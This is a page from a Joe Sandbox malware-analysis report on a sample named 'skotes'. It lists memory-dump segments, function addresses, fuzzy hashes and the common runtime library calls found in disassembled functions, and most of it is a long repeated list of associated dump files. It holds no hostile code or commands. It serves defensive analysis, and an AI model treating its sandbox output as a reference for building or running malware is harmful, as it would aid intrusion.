Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction ID: 600cdfe0eb3a72049971f59de4e2ffbfd6c3fcbb15805a515f39c89af8d3dab8
Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction Fuzzy Hash: 60B148B2D046459FDB11EF28C881BBEBBE9EF95340F14856AE855EB382D6349D01CB70

Function 009967A9 Relevance: 6.2, APIs: 4, Instructions: 245COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00996902
__alloca_probe_16.LIBCMT ref: 00996998
__freea.LIBCMT ref: 00996A03
__freea.LIBCMT ref: 00996A0F

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID:
API String ID: 1635606685-0
Opcode ID: 0b6aa22306359ba4d671c59913520cc0db0d74437e4ebeb8b4a58909e3eadafd
Instruction ID: 71e75b611576641eb7e5dfc9171fadaa9a09b08d7e5c36db27596d12ef8c9c67
Opcode Fuzzy Hash: 0b6aa22306359ba4d671c59913520cc0db0d74437e4ebeb8b4a58909e3eadafd
Instruction Fuzzy Hash: 0081B272D00246ABDF209FAD8881EEF7BB9EF4A354F194159E814B7281E735CC40CBA0

Function 0098504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00985115
___AdjustPointer.LIBCMT ref: 00985138
___AdjustPointer.LIBCMT ref: 009851D4

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 898d7ce2218ffc4d2eda591768e5b1901d7558d01652314d78ecd5c12a5b5d19
Instruction ID: ada37804a4741ce7eae8cc5d1df8f6b655c8685adb7a604a657e47581d90904c
Opcode Fuzzy Hash: 898d7ce2218ffc4d2eda591768e5b1901d7558d01652314d78ecd5c12a5b5d19
Instruction Fuzzy Hash: 73515771609A06AFDB29FF54C885B7A73B9EF50700F16452CE816873A0E731ED48CB90

Function 00984C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00984C66
TypeidsEqual.LIBVCRUNTIME ref: 00984C8B
PMDtoOffset.LIBCMT ref: 00984CA1
PMDtoOffset.LIBCMT ref: 00984D22

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: 785ce3ec0270b81b404bdd7d613792e26d2ede18fb97bc7431fb780742ea6803
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: 84519A35A0420A9FDF11EF68C4806EEFBF9EF15354F14489EE891A7391D732AA05CB90

Function 0097DB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0097DB64

Part of subcall function 00978F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00978F50

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0097DBC3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0097DBE9
Concurrency::location::_Assign.LIBCMT ref: 0097DC56

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
String ID:
API String ID: 1091748018-0
Opcode ID: 78537db88ea7b98444b30afe8dfd5b47a15baeb24d1083d27590fe3a00e410de
Instruction ID: 2452e9a39b7cf4958050f103c79c6069ec4af91dedbfcc9585258b0896441bf2
Opcode Fuzzy Hash: 78537db88ea7b98444b30afe8dfd5b47a15baeb24d1083d27590fe3a00e410de
Instruction Fuzzy Hash: 4041F672705214ABDF1A9B24C886BBDBB79AF89310F04809DE54A5B3C2CB74AD45C791

Function 009756AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_InternalDeleteHelper.LIBCONCRT ref: 009756F2
_InternalDeleteHelper.LIBCONCRT ref: 00975726
Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 0097578B
SafeRWList.LIBCONCRT ref: 0097579A

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
